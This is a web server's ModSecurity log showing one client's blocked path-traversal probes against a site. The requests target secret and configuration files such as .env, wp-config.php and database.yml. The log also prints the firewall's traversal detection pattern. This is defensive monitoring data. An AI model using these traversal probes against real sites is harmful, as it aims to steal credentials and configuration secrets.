[Tue May 12 04:40:16.874163 2026] [security2:error] [pid 1825287:tid 1825328] [client 45.148.10.166:2344] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.tchatbooster.com"] [uri "/index.php"] [unique_id "agKTEAgpmE1yW0glLdgfnwAAANY"], referer: https://tchatbooster.com/uploads../../.env.production
[Tue May 12 04:40:16.897590 2026] [security2:error] [pid 1730207:tid 1730229] [client 45.148.10.166:16614] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_URI_RAW. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "29"] [id "930100"] [rev "3"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_URI_RAW: /uploads../../wp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "tchatbooster.com"] [uri "/wp-config.php"] [unique_id "agKTEDue9Sp-pIv_Bb61xQAAAVQ"]
[Tue May 12 04:40:16.897675 2026] [security2:error] [pid 1730207:tid 1730229] [client 45.148.10.166:16614] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: wp-config.php found within REQUEST_FILENAME: /wp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "tchatbooster.com"] [uri "/wp-config.php"] [unique_id "agKTEDue9Sp-pIv_Bb61xQAAAVQ"]
[Tue May 12 04:40:16.897887 2026] [security2:error] [pid 1730207:tid 1730229] [client 45.148.10.166:16614] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "tchatbooster.com"] [uri "/wp-config.php"] [unique_id "agKTEDue9Sp-pIv_Bb61xQAAAVQ"]
[Tue May 12 04:40:17.358396 2026] [security2:error] [pid 1730207:tid 1730229] [client 45.148.10.166:16614] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=10,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "tchatbooster.com"] [uri "/index.php"] [unique_id "agKTEDue9Sp-pIv_Bb61xQAAAVQ"]
[Tue May 12 04:40:17.513139 2026] [security2:error] [pid 1825179:tid 1825220] [client 45.148.10.166:38918] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: wp-config.php found within REQUEST_FILENAME: /wp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.tchatbooster.com"] [uri "/wp-config.php"] [unique_id "agKTEdr1yOh9TvizeziQIgAAAFY"], referer: https://tchatbooster.com/uploads../../wp-config.php
[Tue May 12 04:40:17.513362 2026] [security2:error] [pid 1825179:tid 1825220] [client 45.148.10.166:38918] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.tchatbooster.com"] [uri "/wp-config.php"] [unique_id "agKTEdr1yOh9TvizeziQIgAAAFY"], referer: https://tchatbooster.com/uploads../../wp-config.php
[Tue May 12 04:40:17.980084 2026] [security2:error] [pid 1825179:tid 1825220] [client 45.148.10.166:38918] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.tchatbooster.com"] [uri "/index.php"] [unique_id "agKTEdr1yOh9TvizeziQIgAAAFY"], referer: https://tchatbooster.com/uploads../../wp-config.php
[Tue May 12 04:40:18.032102 2026] [security2:error] [pid 1730207:tid 1730229] [client 45.148.10.166:16614] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_URI_RAW. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "29"] [id "930100"] [rev "3"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_URI_RAW: /uploads../../app/etc/env.php"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "tchatbooster.com"] [uri "/app/etc/env.php"] [unique_id "agKTEjue9Sp-pIv_Bb61yAAAAVQ"]
[Tue May 12 04:40:18.032301 2026] [security2:error] [pid 1730207:tid 1730229] [client 45.148.10.166:16614] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "tchatbooster.com"] [uri "/app/etc/env.php"] [unique_id "agKTEjue9Sp-pIv_Bb61yAAAAVQ"]
[Tue May 12 04:40:18.492105 2026] [security2:error] [pid 1730207:tid 1730229] [client 45.148.10.166:16614] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Path Traversal Attack (/../)"] [tag "event-correlation"] [hostname "tchatbooster.com"] [uri "/index.php"] [unique_id "agKTEjue9Sp-pIv_Bb61yAAAAVQ"]
[Tue May 12 04:40:19.003653 2026] [security2:error] [pid 1730207:tid 1730229] [client 45.148.10.166:16614] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_URI_RAW. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "29"] [id "930100"] [rev "3"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_URI_RAW: /uploads../../settings.py"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "tchatbooster.com"] [uri "/settings.py"] [unique_id "agKTEzue9Sp-pIv_Bb61ygAAAVQ"]
[Tue May 12 04:40:19.003857 2026] [security2:error] [pid 1730207:tid 1730229] [client 45.148.10.166:16614] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "tchatbooster.com"] [uri "/settings.py"] [unique_id "agKTEzue9Sp-pIv_Bb61ygAAAVQ"]
[Tue May 12 04:40:19.445084 2026] [security2:error] [pid 1730207:tid 1730229] [client 45.148.10.166:16614] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Path Traversal Attack (/../)"] [tag "event-correlation"] [hostname "tchatbooster.com"] [uri "/index.php"] [unique_id "agKTEzue9Sp-pIv_Bb61ygAAAVQ"]
[Tue May 12 04:40:19.983013 2026] [security2:error] [pid 1730207:tid 1730229] [client 45.148.10.166:16614] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_URI_RAW. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "29"] [id "930100"] [rev "3"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_URI_RAW: /uploads../../config/database.yml"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "tchatbooster.com"] [uri "/config/database.yml"] [unique_id "agKTEzue9Sp-pIv_Bb61zAAAAVQ"]
[Tue May 12 04:40:19.983217 2026] [security2:error] [pid 1730207:tid 1730229] [client 45.148.10.166:16614] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "tchatbooster.com"] [uri "/config/database.yml"] [unique_id "agKTEzue9Sp-pIv_Bb61zAAAAVQ"]
[Tue May 12 04:40:20.424496 2026] [security2:error] [pid 1730207:tid 1730229] [client 45.148.10.166:16614] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Path Traversal Attack (/../)"] [tag "event-correlation"] [hostname "tchatbooster.com"] [uri "/index.php"] [unique_id "agKTEzue9Sp-pIv_Bb61zAAAAVQ"]
[Tue May 12 04:40:20.953648 2026] [security2:error] [pid 1730207:tid 1730229] [client 45.148.10.166:16614] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_URI_RAW. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "29"] [id "930100"] [rev "3"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_URI_RAW: /images../../.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "tchatbooster.com"] [uri "/.env"] [unique_id "agKTFDue9Sp-pIv_Bb61zQAAAVQ"]
[Tue May 12 04:40:20.953723 2026] [security2:error] [pid 1730207:tid 1730229] [client 45.148.10.166:16614] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "tchatbooster.com"] [uri "/.env"] [unique_id "agKTFDue9Sp-pIv_Bb61zQAAAVQ"]
[Tue May 12 04:40:20.953883 2026] [security2:error] [pid 1730207:tid 1730229] [client 45.148.10.166:16614] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "tchatbooster.com"] [uri "/.env"] [unique_id "agKTFDue9Sp-pIv_Bb61zQAAAVQ"]
[Tue May 12 04:40:21.417564 2026] [security2:error] [pid 1730207:tid 1730229] [client 45.148.10.166:16614] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=10,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "tchatbooster.com"] [uri "/index.php"] [unique_id "agKTFDue9Sp-pIv_Bb61zQAAAVQ"]
[Tue May 12 04:40:21.434671 2026] [security2:error] [pid 1825179:tid 1825220] [client 45.148.10.166:38918] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.tchatbooster.com"] [uri "/.env"] [unique_id "agKTFdr1yOh9TvizeziQKAAAAFY"], referer: https://tchatbooster.com/images../../.env
[Tue May 12 04:40:21.434880 2026] [security2:error] [pid 1825179:tid 1825220] [client 45.148.10.166:38918] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.tchatbooster.com"] [uri "/.env"] [unique_id "agKTFdr1yOh9TvizeziQKAAAAFY"], referer: https://tchatbooster.com/images../../.env
[Tue May 12 04:40:21.911751 2026] [security2:error] [pid 1825179:tid 1825220] [client 45.148.10.166:38918] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.tchatbooster.com"] [uri "/index.php"] [unique_id "agKTFdr1yOh9TvizeziQKAAAAFY"], referer: https://tchatbooster.com/images../../.env
[Tue May 12 04:40:21.940595 2026] [core:error] [pid 1730207:tid 1730229] [client 45.148.10.166:16614] AH10244: invalid URI path (/images../../../.env)
[Tue May 12 04:40:22.408604 2026] [security2:error] [pid 1825179:tid 1825220] [client 45.148.10.166:38918] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.tchatbooster.com"] [uri "/.env"] [unique_id "agKTFtr1yOh9TvizeziQKgAAAFY"], referer: https://tchatbooster.com/images../../../.env
[Tue May 12 04:40:22.408811 2026] [security2:error] [pid 1825179:tid 1825220] [client 45.148.10.166:38918] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.tchatbooster.com"] [uri "/.env"] [unique_id "agKTFtr1yOh9TvizeziQKgAAAFY"], referer: https://tchatbooster.com/images../../../.env
[Tue May 12 04:40:22.901934 2026] [security2:error] [pid 1825179:tid 1825220] [client 45.148.10.166:38918] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.tchatbooster.com"] [uri "/index.php"] [unique_id "agKTFtr1yOh9TvizeziQKgAAAFY"], referer: https://tchatbooster.com/images../../../.env
[Tue May 12 04:40:22.988196 2026] [core:error] [pid 1730207:tid 1730222] [client 45.148.10.166:38924] AH10244: invalid URI path (/images../../../../.env)
[Tue May 12 04:40:23.468388 2026] [security2:error] [pid 1825179:tid 1825220] [client 45.148.10.166:38918] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.tchatbooster.com"] [uri "/.env"] [unique_id "agKTF9r1yOh9TvizeziQLAAAAFY"], referer: https://tchatbooster.com/images../../../../.env
[Tue May 12 04:40:23.468614 2026] [security2:error] [pid 1825179:tid 1825220] [client 45.148.10.166:38918] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.tchatbooster.com"] [uri "/.env"] [unique_id "agKTF9r1yOh9TvizeziQLAAAAFY"], referer: https://tchatbooster.com/images../../../../.env
[Tue May 12 04:40:23.951742 2026] [security2:error] [pid 1825179:tid 1825220] [client 45.148.10.166:38918] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.tchatbooster.com"] [uri "/index.php"] [unique_id "agKTF9r1yOh9TvizeziQLAAAAFY"], referer: https://tchatbooster.com/images../../../../.env
[Tue May 12 04:40:24.090584 2026] [security2:error] [pid 1730207:tid 1730218] [client 45.148.10.166:38928] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_URI_RAW. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "29"] [id "930100"] [rev "3"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_URI_RAW: /images../../.env.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "tchatbooster.com"] [uri "/.env.local"] [unique_id "agKTGDue9Sp-pIv_Bb610gAAAUk"]
[Tue May 12 04:40:24.090673 2026] [security2:error] [pid 1730207:tid 1730218] [client 45.148.10.166:38928] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "tchatbooster.com"] [uri "/.env.local"] [unique_id "agKTGDue9Sp-pIv_Bb610gAAAUk"]
[Tue May 12 04:40:24.090855 2026] [security2:error] [pid 1730207:tid 1730218] [client 45.148.10.166:38928] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "tchatbooster.com"] [uri "/.env.local"] [unique_id "agKTGDue9Sp-pIv_Bb610gAAAUk"]
[Tue May 12 04:40:24.541359 2026] [security2:error] [pid 1730207:tid 1730218] [client 45.148.10.166:38928] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=10,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "tchatbooster.com"] [uri "/index.php"] [unique_id "agKTGDue9Sp-pIv_Bb610gAAAUk"]
[Tue May 12 04:40:24.559954 2026] [security2:error] [pid 1825179:tid 1825220] [client 45.148.10.166:38918] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.tchatbooster.com"] [uri "/.env.local"] [unique_id "agKTGNr1yOh9TvizeziQLgAAAFY"], referer: https://tchatbooster.com/images../../.env.local
